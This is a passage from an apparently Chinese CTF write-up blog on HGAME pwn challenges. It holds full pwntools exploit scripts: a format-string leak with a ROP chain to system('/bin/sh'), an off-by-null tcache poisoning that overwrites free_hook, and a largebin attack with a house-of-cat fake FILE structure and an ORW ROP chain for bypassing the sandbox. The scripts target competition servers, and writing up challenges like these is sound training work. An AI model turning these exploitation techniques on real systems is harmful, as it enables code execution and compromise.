=&#x27;</span>,str(<span class="hljs-number">3</span>))<br>io.sendlineafter(b<span class="hljs-string">&#x27;type something:&#x27;</span>,b<span class="hljs-string">&#x27;%p&#x27;</span>)<br>io.recvuntil(<span class="hljs-string">&#x27;you type:&#x27;</span>)<br><br>rsi = <span class="hljs-keyword">int</span>(io.recv(<span class="hljs-number">15</span>),<span class="hljs-number">16</span>)<br><br>rsp = rsi + <span class="hljs-number">0x2120</span><br><span class="hljs-keyword">print</span>(<span class="hljs-keyword">hex</span>(rsp))<br>main = rsp + <span class="hljs-number">0x28</span><br><span class="hljs-keyword">print</span>(<span class="hljs-keyword">hex</span>(main))<br>stack_addr = main - <span class="hljs-number">0x38</span><br><span class="hljs-keyword">print</span>(stack_addr)<br>vuln = <span class="hljs-number">0x4011b6</span><br><br>io.sendlineafter(b<span class="hljs-string">&#x27;type something:&#x27;</span>,b<span class="hljs-string">&#x27;%*d&#x27;</span>)<br>io.recv()<br><br>io.sendlineafter(b<span class="hljs-string">&#x27;type something:&#x27;</span>,b<span class="hljs-string">&#x27;%s&#x27;</span>)<br>io.recvuntil(b<span class="hljs-string">&#x27;\xa0&#x27;</span>)<br>data = b<span class="hljs-string">&#x27;\xa0&#x27;</span> + io.recv(<span class="hljs-number">5</span>)<br>addr = u64(data.ljust(<span class="hljs-number">8</span>, b<span class="hljs-string">&#x27;\x00&#x27;</span>))<br><span class="hljs-keyword">print</span>(<span class="hljs-keyword">hex</span>(addr))<br><br>libc_base = addr - libc.symbols[<span class="hljs-string">&#x27;_IO_2_1_stdin_&#x27;</span>]<br><span class="hljs-keyword">print</span>(<span class="hljs-keyword">hex</span>(libc_base))<br><br><span class="hljs-keyword">system</span> = libc_base + libc.symbols[<span class="hljs-string">&#x27;system&#x27;</span>]<br>bin_sh = libc_base + <span class="hljs-keyword">next</span>(libc.search(b<span class="hljs-string">&#x27;/bin/sh\x00&#x27;</span>))<br>pop_rdi = libc_base + <span class="hljs-number">0x2a3e5</span><br>ret = <span class="hljs-number">0x40101a</span><br><span class="hljs-keyword">print</span>(<span class="hljs-string">&quot;system:&quot;</span> + <span class="hljs-keyword">hex</span>(<span class="hljs-keyword">system</span>))<br><span class="hljs-keyword">print</span>(<span class="hljs-string">&quot;/bin/sh:&quot;</span> + <span class="hljs-keyword">hex</span>(bin_sh))<br><span class="hljs-keyword">print</span>(<span class="hljs-string">&quot;pop_rdi:&quot;</span> + <span class="hljs-keyword">hex</span>(pop_rdi))<br><br>payload1 = b<span class="hljs-string">&#x27;aaaa&#x27;</span> + p64(stack_addr) + p64(ret) + p64(pop_rdi) + p64(bin_sh) + p64(<span class="hljs-keyword">system</span>)<br>io.sendlineafter(b<span class="hljs-string">&#x27;n =&#x27;</span>,b<span class="hljs-string">&#x27;-1\n5&#x27;</span> + payload1)<br>io.recv()<br><br>io.interactive()<br></code></pre></td></tr></table></figure>

<h1 id="WEEK2"><a href="#WEEK2" class="headerlink" title="WEEK2"></a>WEEK2</h1><h2 id="signin2heap"><a href="#signin2heap" class="headerlink" title="signin2heap"></a>signin2heap</h2><p>逆向分析找到仅有一个漏洞点在：</p>
<figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs lisp">size_4 = read(<span class="hljs-number">0</span>, *(&amp;books + v2), size);<br>*(<span class="hljs-name">*</span>(<span class="hljs-name">&amp;books</span> + v2) + size_4) = <span class="hljs-number">0</span><span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure>
<p>看出这是一个off-by-null的漏洞。这题的libc版本为2.27，存在tcache，并且这题是2.27后期的版本，tcache中是有key的，所以我们不能直接通过double free来造成任意地址写，需要打两次off-by-null。</p>
<p>第一次off-by-null用来泄露出libc的地址。<br>第二次off-by-null通过堆块重叠来打tcache poisoning，将free_hook改为system。</p>
<p>exp：</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><br>context(log_level = <span class="hljs-string">&#x27;debug&#x27;</span>)<br><br>io = process(<span class="hljs-string">&quot;./vuln&quot;</span>)<br>io = remote(<span class="hljs-string">&#x27;node1.hgame.vidar.club&#x27;</span>,30729)<br>elf = ELF(<span class="hljs-string">&quot;./vuln&quot;</span>)<br>libc = ELF(<span class="hljs-string">&quot;./libc-2.27.so&quot;</span>) <br><br><br>def <span class="hljs-built_in">add</span>(index,size,content):<br>    io.sendlineafter(b<span class="hljs-string">&#x27;Your choice:&#x27;</span>,p32(1))<br>    io.sendlineafter(b<span class="hljs-string">&#x27;Index:&#x27;</span>,str(index))<br>    io.sendlineafter(b<span class="hljs-string">&#x27;Size:&#x27;</span>,str(size))<br>    io.sendafter(b<span class="hljs-string">&#x27;Content:&#x27;</span>,content)<br><br>def dele(index):<br>    io.sendlineafter(b<span class="hljs-string">&#x27;Your choice:&#x27;</span>,p32(2))<br>    io.sendlineafter(b<span class="hljs-string">&#x27;Index:&#x27;</span>,str(index))<br><br>def show(index):<br>    io.sendlineafter(b<span class="hljs-string">&#x27;Your choice:&#x27;</span>,p32(3))<br>    io.sendlineafter(b<span class="hljs-string">&#x27;Index:&#x27;</span>,str(index))<br><br><span class="hljs-comment">#gdb.attach(io)</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(7):<br>    <span class="hljs-built_in">add</span>(i,0xf8,b<span class="hljs-string">&#x27;aaaaaaaa&#x27;</span>)<br><br><span class="hljs-built_in">add</span>(7,0xf8,b<span class="hljs-string">&#x27;bbbbbbbb&#x27;</span>)<br><span class="hljs-built_in">add</span>(8,0x98,b<span class="hljs-string">&#x27;bbbbbbbb&#x27;</span>)<br><span class="hljs-built_in">add</span>(9,0xf8,b<span class="hljs-string">&#x27;bbbbbbbb&#x27;</span>)<br><span class="hljs-built_in">add</span>(10,0xf8,b<span class="hljs-string">&#x27;zzzzzzzz&#x27;</span>)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(7):<br>    dele(i)<br>dele(7)<br>dele(8)<br><br>payload1 = b<span class="hljs-string">&#x27;a&#x27;</span>* 0x90 + p64(0x1a0)<br><span class="hljs-built_in">add</span>(8,0x98,payload1)<br>dele(9)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(7):<br>    <span class="hljs-built_in">add</span>(i,0xf8,b<span class="hljs-string">&#x27;aaaaaaaa&#x27;</span>)<br><br><span class="hljs-built_in">add</span>(7,0xf8,b<span class="hljs-string">&#x27;bbbbbbbb&#x27;</span>)<br><br>show(8)<br>io.recv()<br>main_arena = u64(io.recv(6).ljust(8,b<span class="hljs-string">&#x27;\x00&#x27;</span>)) - 96<br>libc_base = main_arena - 0x3ebc40<br><span class="hljs-built_in">print</span>(hex(main_arena))<br><span class="hljs-built_in">print</span>(hex(libc_base))<br><br>free_hook = libc_base + libc.symbols[<span class="hljs-string">&#x27;__free_hook&#x27;</span>]<span class="hljs-built_in"></span><br><span class="hljs-built_in">system </span>= libc_base + libc.symbols[<span class="hljs-string">&#x27;system&#x27;</span>]<br><br><span class="hljs-built_in">add</span>(13,0x80,b<span class="hljs-string">&#x27;gggggggg&#x27;</span>)<br><span class="hljs-built_in">add</span>(14,0x80,b<span class="hljs-string">&#x27;gggggggg&#x27;</span>)<br><span class="hljs-built_in">add</span>(15,0x70,b<span class="hljs-string">&#x27;gggggggg&#x27;</span>)<br><br>dele(10)<br><span class="hljs-built_in">add</span>(9,0xf8,b<span class="hljs-string">&#x27;aaaaaaaa&#x27;</span>)<br><span class="hljs-built_in">add</span>(10,0x38,b<span class="hljs-string">&#x27;aaaaaaaa&#x27;</span>)<br><span class="hljs-built_in">add</span>(11,0xf8,b<span class="hljs-string">&#x27;aaaaaaaa&#x27;</span>)<br><span class="hljs-built_in">add</span>(12,0x20,b<span class="hljs-string">&#x27;/bin/sh\x00&#x27;</span>)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(7):<br>    dele(i)<br>dele(9)<br>dele(10)<br><br>payload2 = b<span class="hljs-string">&#x27;a&#x27;</span><span class="hljs-number">*0</span>x30 + p64(0x140)<br><span class="hljs-built_in">add</span>(10,0x38,payload2)<br>dele(11)<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(7):<br>    dele(i)<br>dele(10)<br><br>payload3 = p64(0)<span class="hljs-number">*2</span> + p64(0x100) + p64(0x40) + p64(free_hook)<br><span class="hljs-built_in">add</span>(0,0xd0,b<span class="hljs-string">&#x27;aaaaaaaa&#x27;</span>)<br><span class="hljs-built_in">add</span>(1,0xe0,payload3)<br><span class="hljs-built_in">add</span>(2,0x38,b<span class="hljs-string">&#x27;llllllll&#x27;</span>)<br><br>payload4 = p64(system)<br><span class="hljs-built_in">add</span>(3,0x38,payload4)<br>dele(12)<br><br>io.interactive()<br></code></pre></td></tr></table></figure>

<h2 id="Where-is-the-vulnerability"><a href="#Where-is-the-vulnerability" class="headerlink" title="Where_is_the_vulnerability"></a>Where_is_the_vulnerability</h2><p>本题的四个增删查改的函数是使用动态链接库实现的，所以本地动调改libc时要记得把题目给的libhgame.so文件也加上。</p>
<p>逆向后发现delete函数存在uaf漏洞：</p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs scss"><span class="hljs-built_in">printf</span>(&quot;Index: &quot;);<br> <span class="hljs-built_in">__isoc99_scanf</span>(&quot;%u&quot;, &amp;v1);<br> if ( v1 &lt;= <span class="hljs-number">0</span>xF )<br> &#123;<br>   if ( notes[v1] )<br>     <span class="hljs-built_in">free</span>(notes[v1]);<br>   else<br>     <span class="hljs-built_in">puts</span>(&quot;Page not found.&quot;);<br> &#125;<br> else<br> &#123;<br>   <span class="hljs-built_in">puts</span>(&quot;There are only <span class="hljs-number">16</span> pages in this notebook.&quot;);<br> &#125;<br></code></pre></td></tr></table></figure>
<p>并且本题开了沙箱：</p>
<figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs dns"> line  CODE  JT   JF      K<br>=================================<br> <span class="hljs-number">0000</span>: <span class="hljs-number">0x20 0x00</span> <span class="hljs-number">0</span>x00 <span class="hljs-number">0x00000000</span>  <span class="hljs-keyword">A</span> = sys_number<br> <span class="hljs-number">0001</span>: <span class="hljs-number">0x35 0x03</span> <span class="hljs-number">0</span>x00 <span class="hljs-number">0x40000000</span>  if (<span class="hljs-keyword">A</span> &gt;= <span class="hljs-number">0x40000000</span>) goto <span class="hljs-number">0005</span><br> <span class="hljs-number">0002</span>: <span class="hljs-number">0x15 0x02</span> <span class="hljs-number">0</span>x00 <span class="hljs-number">0</span>x0000003b  if (<span class="hljs-keyword">A</span> == execve) goto <span class="hljs-number">0005</span><br> <span class="hljs-number">0003</span>: <span class="hljs-number">0x15 0x01</span> <span class="hljs-number">0</span>x00 <span class="hljs-number">0x00000142</span>  if (<span class="hljs-keyword">A</span> == execveat) goto <span class="hljs-number">0005</span><br> <span class="hljs-number">0004</span>: <span class="hljs-number">0x06 0x00</span> <span class="hljs-number">0</span>x00 <span class="hljs-number">0</span>x7fff0000  return ALLOW<br> <span class="hljs-number">0005</span>: <span class="hljs-number">0x06 0x00</span> <span class="hljs-number">0</span>x00 <span class="hljs-number">0x00000000</span>  return KILL<br></code></pre></td></tr></table></figure>
<p>需要使用orw。</p>
<p>add函数只能申请到largebin，想到打largbin attack，并且本题libc版本为2.39，只能改bk_nextsize。</p>
<p>之后就是十分模板的house of的利用了。</p>
<p>官方给出的的wp是house of apple+mprotect，十分简洁优雅。相比之下我打的house of cat+ROP就有点复杂了。</p>
<p>我的wp里需要注意一点，由于使用的是ROP的orw，需要控制到rdi，rsi，rdx这三个寄存器，但是本题的libc.so.6库里没有直接的<br><code>pop rdx ; ret;</code>，<br>只有<br><code> pop rdx ; ret 0x19</code>，<br>所以要在后面加上一个<br><code>ret 7; </code><br>来调栈，就像这样<br><code>p64(pop_rdx) + p64(0x60) + p64(ret_7) + p64(0)*3 + b&#39;0&#39; + p64(read)</code>。</p>
<p>exp：</p>
<figure class="highlight axapta"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br></pre></td><td class="code"><pre><code class="hljs axapta"><span class="hljs-keyword">from</span> pwn import *<br><br>context(log_level = <span class="hljs-string">&#x27;debug&#x27;</span>)<br><br><span class="hljs-meta">#io = process(&quot;./vuln&quot;)</span><br>io = remote(<span class="hljs-string">&quot;node1.hgame.vidar.club&quot;</span>,<span class="hljs-number">30758</span>)<br>elf = ELF(<span class="hljs-string">&quot;./vuln&quot;</span>)<br>libc = ELF(<span class="hljs-string">&quot;./libc.so.6&quot;</span>)<br><br>def add(<span class="hljs-keyword">index</span>,size):<br>    io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,b<span class="hljs-string">&#x27;1&#x27;</span>)<br>    io.sendlineafter(b<span class="hljs-string">&#x27;Index:&#x27;</span>,<span class="hljs-built_in">str</span>(<span class="hljs-keyword">index</span>))<br>    io.sendlineafter(b<span class="hljs-string">&#x27;Size:&#x27;</span>,<span class="hljs-built_in">str</span>(size))<br><br>def dele(<span class="hljs-keyword">index</span>):<br>    io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,b<span class="hljs-string">&#x27;2&#x27;</span>)<br>    io.sendlineafter(b<span class="hljs-string">&#x27;Index:&#x27;</span>,<span class="hljs-built_in">str</span>(<span class="hljs-keyword">index</span>))<br><br>def show(<span class="hljs-keyword">index</span>):<br>    io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,b<span class="hljs-string">&#x27;4&#x27;</span>)<br>    io.sendlineafter(b<span class="hljs-string">&#x27;Index:&#x27;</span>,<span class="hljs-built_in">str</span>(<span class="hljs-keyword">index</span>))<br><br>def <span class="hljs-keyword">edit</span>(<span class="hljs-keyword">index</span>,content):<br>    io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,b<span class="hljs-string">&#x27;3&#x27;</span>)<br>    io.sendlineafter(b<span class="hljs-string">&#x27;Index&#x27;</span>,<span class="hljs-built_in">str</span>(<span class="hljs-keyword">index</span>))<br>    io.sendafter(b<span class="hljs-string">&#x27;Content:&#x27;</span>,content)<br><br><span class="hljs-meta">#gdb.attach(io)</span><br><br>add(<span class="hljs-number">0</span>,<span class="hljs-number">0x528</span>)<br>add(<span class="hljs-number">1</span>,<span class="hljs-number">0x508</span>)<br>add(<span class="hljs-number">2</span>,<span class="hljs-number">0x518</span>)<br>add(<span class="hljs-number">3</span>,<span class="hljs-number">0x500</span>)<br>dele(<span class="hljs-number">0</span>)<br>add(<span class="hljs-number">4</span>,<span class="hljs-number">0x538</span>)<br>dele(<span class="hljs-number">2</span>)<br><br><span class="hljs-meta">#pause()</span><br><br>show(<span class="hljs-number">0</span>)<br><span class="hljs-keyword">print</span>(io.recv())<br><br>main_arena = u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,b<span class="hljs-string">&#x27;\x00&#x27;</span>)) - <span class="hljs-number">0x490</span><br>libc_base = main_arena - <span class="hljs-number">0x203AC0</span><br><span class="hljs-keyword">print</span>(<span class="hljs-string">&quot;liba_base:&quot;</span> + hex(libc_base))<br><br><span class="hljs-keyword">edit</span>(<span class="hljs-number">0</span>,b<span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x10</span>)<br><br>show(<span class="hljs-number">0</span>)<br>io.recvuntil(b<span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x10</span>)<br>heap_addr = u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,b<span class="hljs-string">&#x27;\x00&#x27;</span>)) - <span class="hljs-number">0x290</span><br><span class="hljs-keyword">print</span>(<span class="hljs-string">&quot;heap_addr:&quot;</span> + hex(heap_addr))<br><br>IO_list_all = libc_base + libc.symbols[<span class="hljs-string">&#x27;_IO_list_all&#x27;</span>]<br><br>payload1 = p64(<span class="hljs-number">0</span>)*<span class="hljs-number">2</span> + p64(<span class="hljs-number">0</span>) + p64(IO_list_all - <span class="hljs-number">0x20</span>)<br><span class="hljs-keyword">edit</span>(<span class="hljs-number">0</span>,payload1)<br><br>add(<span class="hljs-number">5</span>,<span class="hljs-number">0x538</span>)<br><span class="hljs-meta">#pause()</span><br><br>io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,b<span class="hljs-string">&#x27;3&#x27;</span>)<br>io.sendlineafter(b<span class="hljs-string">&#x27;Index&#x27;</span>,b<span class="hljs-string">&#x27;1&#x27;</span>)<br>payload = b<span class="hljs-string">&#x27;flag&#x27;</span>.ljust(<span class="hljs-number">8</span>,b<span class="hljs-string">&#x27;\x00&#x27;</span>)<br>io.sendlineafter(b<span class="hljs-string">&#x27;Content:&#x27;</span>,payload)<br><span class="hljs-meta">#edit(1,b&#x27;a&#x27;*0x500 + b&#x27;flag&#x27;.ljust(8,b&#x27;\x00&#x27;))</span><br><br>_IO_wfile_jumps = libc_base+ libc.symbols[<span class="hljs-string">&#x27;_IO_wfile_jumps&#x27;</span>]<br><br>system = libc_base + libc.symbols[<span class="hljs-string">&#x27;system&#x27;</span>]<br>op = libc_base + libc.symbols[<span class="hljs-string">&#x27;open&#x27;</span>]<br>re = libc_base + libc.symbols[<span class="hljs-string">&#x27;read&#x27;</span>]<br>wr = libc_base + libc.symbols[<span class="hljs-string">&#x27;write&#x27;</span>]<br>puts = libc_base + libc.symbols[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>pop_rdi = <span class="hljs-number">0x10f75b</span> + libc_base<br>pop_rsi = <span class="hljs-number">0x110a4d</span> + libc_base<br>pop_rdx = <span class="hljs-number">0x66b9a</span> + libc_base<br>ret = <span class="hljs-number">0x2882f</span> + libc_base<br>ret_7 = <span class="hljs-number">0x380b7</span> + libc_base<br>setcontext = libc_base + libc.symbols[<span class="hljs-string">&#x27;setcontext&#x27;</span>]<br>fake_io_addr = heap_addr + <span class="hljs-number">0xcd0</span><br>fake_struct = p64(<span class="hljs-number">0</span>) <span class="hljs-meta">#_IO_read_end</span><br>fake_struct += p64(<span class="hljs-number">0</span>) <span class="hljs-meta">#_IO_read_base</span><br>fake_struct += p64(<span class="hljs-number">0</span>) <span class="hljs-meta">#_IO_write_base</span><br>fake_struct += p64(<span class="hljs-number">0</span>) <span class="hljs-meta">#_IO_write_ptr</span><br>fake_struct += p64(<span class="hljs-number">0</span>) <span class="hljs-meta">#_IO_write_end</span><br>fake_struct += p64(<span class="hljs-number">0</span>) <span class="hljs-meta">#_IO_buf_base</span><br>fake_struct += p64(<span class="hljs-number">0</span>) <span class="hljs-meta">#_IO_buf_end</span><br>fake_struct += p64(<span class="hljs-number">1</span>) <span class="hljs-meta">#_IO_save_base</span><br>fake_struct += p64(fake_io_addr + <span class="hljs-number">0xb0</span>) <span class="hljs-meta">#_IO_backup_base = rdx</span><br>fake_struct += p64(setcontext + <span class="hljs-number">61</span>) <span class="hljs-meta">#_IO_save_end = call_addr</span><br>fake_struct += p64(<span class="hljs-number">0xffffffffffffff</span>)  <span class="hljs-meta">#_markers</span><br>fake_struct += p64(<span class="hljs-number">0</span>)  <span class="hljs-meta">#_chain</span><br>fake_struct += p64(<span class="hljs-number">0</span>)  <span class="hljs-meta">#_fileno</span><br>fake_struct += p64(<span class="hljs-number">0</span>)  <span class="hljs-meta">#_old_offset</span><br>fake_struct += p64(<span class="hljs-number">0</span>)  <span class="hljs-meta">#_cur_column</span><br>fake_struct += p64(heap_addr + <span class="hljs-number">0x200</span>) <span class="hljs-meta">#_lock = heap_addr or writeable libc_addr</span><br>fake_struct += p64(<span class="hljs-number">0</span>) <span class="hljs-meta">#_offset</span><br>fake_struct += p64(<span class="hljs-number">0</span>) <span class="hljs-meta">#_codecvx</span><br>fake_struct += p64(fake_io_addr + <span class="hljs-number">0x30</span>) <span class="hljs-meta">#_wfile_data rax1</span><br>fake_struct += p64(<span class="hljs-number">0</span>) <span class="hljs-meta">#_freers_list</span><br>fake_struct += p64(<span class="hljs-number">0</span>) <span class="hljs-meta">#_freers_buf</span><br>fake_struct += p64(<span class="hljs-number">0</span>) <span class="hljs-meta">#__pad5</span><br>fake_struct += p32(<span class="hljs-number">1</span>) <span class="hljs-meta">#_mode</span><br>fake_struct += b<span class="hljs-string">&quot;\x00&quot;</span>*<span class="hljs-number">20</span> <span class="hljs-meta">#_unused2</span><br>fake_struct += p64(_IO_wfile_jumps + <span class="hljs-number">0x30</span>) <span class="hljs-meta">#vtable</span><br>fake_struct += p64(<span class="hljs-number">0</span>)*<span class="hljs-number">6</span> <span class="hljs-meta">#padding</span><br>fake_struct += p64(fake_io_addr + <span class="hljs-number">0x40</span>) <span class="hljs-meta">#rax2 -&gt; to make [rax+0x18] = setcontext + 61</span><br><br>fake_struct = fake_struct.ljust(<span class="hljs-number">0x118</span>,b<span class="hljs-string">&#x27;\x00&#x27;</span>) + p64(fake_io_addr + <span class="hljs-number">0x128</span> + <span class="hljs-number">0x28</span>) + p64(ret) + p64(<span class="hljs-number">0x60</span>)*<span class="hljs-number">3</span> + p64(fake_io_addr + <span class="hljs-number">0x128</span> + <span class="hljs-number">0x28</span>)<br>fake_struct += p64(pop_rdi) + p64(heap_addr+<span class="hljs-number">0xcd0</span> - <span class="hljs-number">0x500</span>) + p64(op)<br>fake_struct += p64(pop_rdi) + p64(<span class="hljs-number">3</span>) + p64(pop_rsi) + p64(heap_addr + <span class="hljs-number">0x330</span>) + p64(pop_rdx) + p64(<span class="hljs-number">0x60</span>) + p64(ret_7) + p64(<span class="hljs-number">0</span>)*<span class="hljs-number">3</span> + b<span class="hljs-string">&#x27;0&#x27;</span> + p64(re) + b<span class="hljs-string">&#x27;0000000&#x27;</span><br>fake_struct += p64(pop_rdi) + p64(heap_addr + <span class="hljs-number">0x330</span>) + p64(puts)<br><br><span class="hljs-keyword">edit</span>(<span class="hljs-number">2</span>,fake_struct)<br>io.sendlineafter(b<span class="hljs-string">&#x27;&gt;&#x27;</span>,b<span class="hljs-string">&#x27;5&#x27;</span>)<br><br>io.interactive()<br></code></pre></td></tr></table></figure>

<h2 id="Hit-list"><a href="#Hit-list" class="headerlink" title="Hit list"></a>Hit list</h2><p>本题也是有增删查改四个功能的模板题，实现了一个单链表。做题的时候画了一个草图（有点难看请见谅<br><img src="/images/2.png" srcset="/img/loading.gif" lazyload title="chunk"></p>
<p>对程序分析可以看出，每次调用add函数都会分配两个堆块，一个大小固定为0x20（我们叫它info块），另一个大小我们可以控制（我们叫它data块），但是最大只能有0x3f0 ，也就是说不能直接分配得到一个largebin。</p>
<p>接下来我们注意到，在edit函数中，每次我们调用时，都会先将数据块先free掉，再重新malloc一个。</p>
<p>最后在sub_13F3这个函数中，发现当我们malloc分配失败时，会调用gift函数，在这个函数中，我们有且仅有一次机会可以任意地址free。</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-function">__int64 <span class="hljs-title">gift</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>  <span class="hljs-type">void</span> *ptr[<span class="hljs-number">2</span>]; <span class="hljs-comment">// [rsp+0h] [rbp-10h] BYREF</span><br><br>  ptr[<span class="hljs-number">1</span>] = __readfsqword(<span class="hljs-number">0x28</span>u);<br>  <span class="hljs-keyword">if</span> ( !dword_4064 )<br>  &#123;<br>    <span class="hljs-built_in">putchar</span>(<span class="hljs-string">&#x27;&gt;&#x27;</span>);<br>    __isoc99_scanf(<span class="hljs-string">&quot;%p&quot;</span>, ptr);<br>    <span class="hljs-built_in">free</span>(ptr[<span class="hljs-number">0</span>]);<br>    ++dword_4064;<br>  &#125;<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0LL</span>;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>想要进入这个分支也很简单，传入一个负数就好了。</p>
<p>逆向分析完之后，我们就该想想怎么打这题了。</p>
<p>这题libc版本为2.35，无沙箱，漏洞点仅在gift函数的一次任意地址free里。<br>那么首先，我们应该先想办法泄露libc和heap的地址。</p>
<p>heap的地址可以通过tcache泄露出来，但是libc2.32加入了指针保护，即将fd指针地址右移12位再与fd指针本身异或。<br>一般来说，如果tcachebin链表中只有一个chunk时，只需直接将fd &lt;&lt; 12即可得到heap的基址。</p>
